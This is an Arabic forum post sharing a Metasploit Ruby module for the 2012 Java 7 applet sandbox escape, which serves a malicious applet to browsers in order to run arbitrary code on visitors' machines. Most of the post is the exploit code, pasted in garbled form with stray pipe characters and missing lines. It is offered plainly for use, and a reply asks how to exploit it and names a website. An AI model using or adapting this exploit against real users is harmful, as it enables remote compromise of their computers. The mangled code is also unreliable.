السلام عليكم اخواني
كيف الحال انشاء الله طيبين
قام فريق
require
'msf/core'
class Metasploit3 < Msf::Exploit::Remote |
include Msf::Exploit::Remote::HttpServer:: HTML |
include Msf::Exploit::Remote::BrowserAutopwn |
autopwn_info({ :javascript => false }) |
def initialize( info = {} ) |
super ( update_info( info, |
'Name' => 'Java 7 Applet Remote Code Execution' , |
This module exploits a vulnerability in Java 7 , which allows an attacker to run arbitrary |
Java code outside the sandbox. This flaw is also being exploited in the wild, and there is |
no patch from Oracle at this point. The exploit has been tested to work against: IE , Chrome |
and Firefox across different platforms. |
'License' => MSF_LICENSE , |
[ 'URL' , 'http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html' ], |
[ 'URL' , 'http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html' ] |
'Platform' => [ 'java' , 'win' , 'linux' ], |
'Payload' => { 'Space' => 20480 , 'BadChars' => '' , 'DisableNops' => true }, |
[ 'Generic (Java Payload)' , |
'DisclosureDate' => 'Aug 26 2012' |
def on_request_uri( cli, request ) |
if not request.uri.match(/\.jar$/i) |
if not request.uri.match(/\/$/) |
send_redirect(cli, get_resource() + '/' , '' ) |
print_status( "#{self.name} handling request" ) |
send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } ) |
p = regenerate_payload(cli) |
1 .upto(path.length - 1 ) do |idx| |
full = path[ 0 ,idx].join( "/" ) + "/" |
if !(jar.entries.map{|e|e.name}.include?(full)) |
fd = File .open( File .join( Msf::Config.install_root, "data" , "exploits" , "CVE-2012-XXXX" , path ), "rb" ) |
data = fd.read(fd.stat.size) |
jar.add_file(path.join( "/" ), data) |
print_status( "Sending Applet.jar" ) |
send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } ) |
html = "<html><head></head>" |
html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">" |
html += "</applet></body></html>" |
end
------------------------------------------------------------------------------------------------------------------------
هاذا كود الثغرة طبعا الاستغلال يكون عبر الميتا
والثغرة مكتوبة بالروبي
في امان الله وحفظه اخوكم:mr.hmada
شكرأأ لك اخي لكن كيف طريقة لاستغلال www.3oyooon.com